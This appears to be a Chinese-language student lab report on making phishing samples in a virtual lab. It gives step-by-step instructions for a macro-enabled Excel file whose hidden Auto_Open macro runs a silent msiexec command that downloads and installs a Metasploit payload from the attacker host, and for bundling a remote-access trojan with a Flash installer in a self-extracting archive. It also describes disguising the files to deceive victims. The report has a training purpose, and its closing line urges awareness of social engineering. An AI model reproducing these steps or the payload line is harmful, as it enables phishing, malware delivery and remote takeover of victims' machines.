一、实验目的
学会制作简单的钓鱼样本并理解钓鱼样本木马的工作原理。
二、实验任务
1、制作恶意的excel文件
2、将正常的软件和恶意木马进行捆绑打包
三、实验环境
1、靶机地址:192.168.137.132
2、攻击机地址:192.168.137.128
四、实验过程和实验结果
(一)excel宏
1.msf生成恶意的msi文件
- msf建立监听
- python在具有恶意的msi的文件夹下开启http服务
- 开始制作excel
改一个更加容易让受害者相信的文件名,并加一些内容蒙混
- 插入宏
选择插入宏表
=EXEC("msiexec /q /i http://192.168.32.128/diaoyu.msi")
在A1 左上角改成Auto_Open让exl打开时候自动运行宏,然后回车
然后隐藏宏,并另存为启用宏的工作表
保存后拖到windows7的虚拟机,运行然后启用宏
成功上线
- 常规软件捆绑远控木马进行钓鱼
制作msf木马
将制作的木马程序和flash安装包用winrar压缩在一起,并设置解压后运行这两个文件
打开监听
将压缩文件拖到win7中
点击安装,成功上线
五、实验总结
通过本次实验,我学会制作简单的钓鱼样本并理解钓鱼样本木马的工作原理。
实验过程中遇到的问题:恶意excel文件多次尝试不能上线,通过多次重新制作excel文件、仔细核对文件左上角的木马并多次尝试解决;正常文件和恶意木马打包时要使用特定的压缩工具打包。
在日常工作、生活中要警惕社会工程的渗透,提高信息安全意识。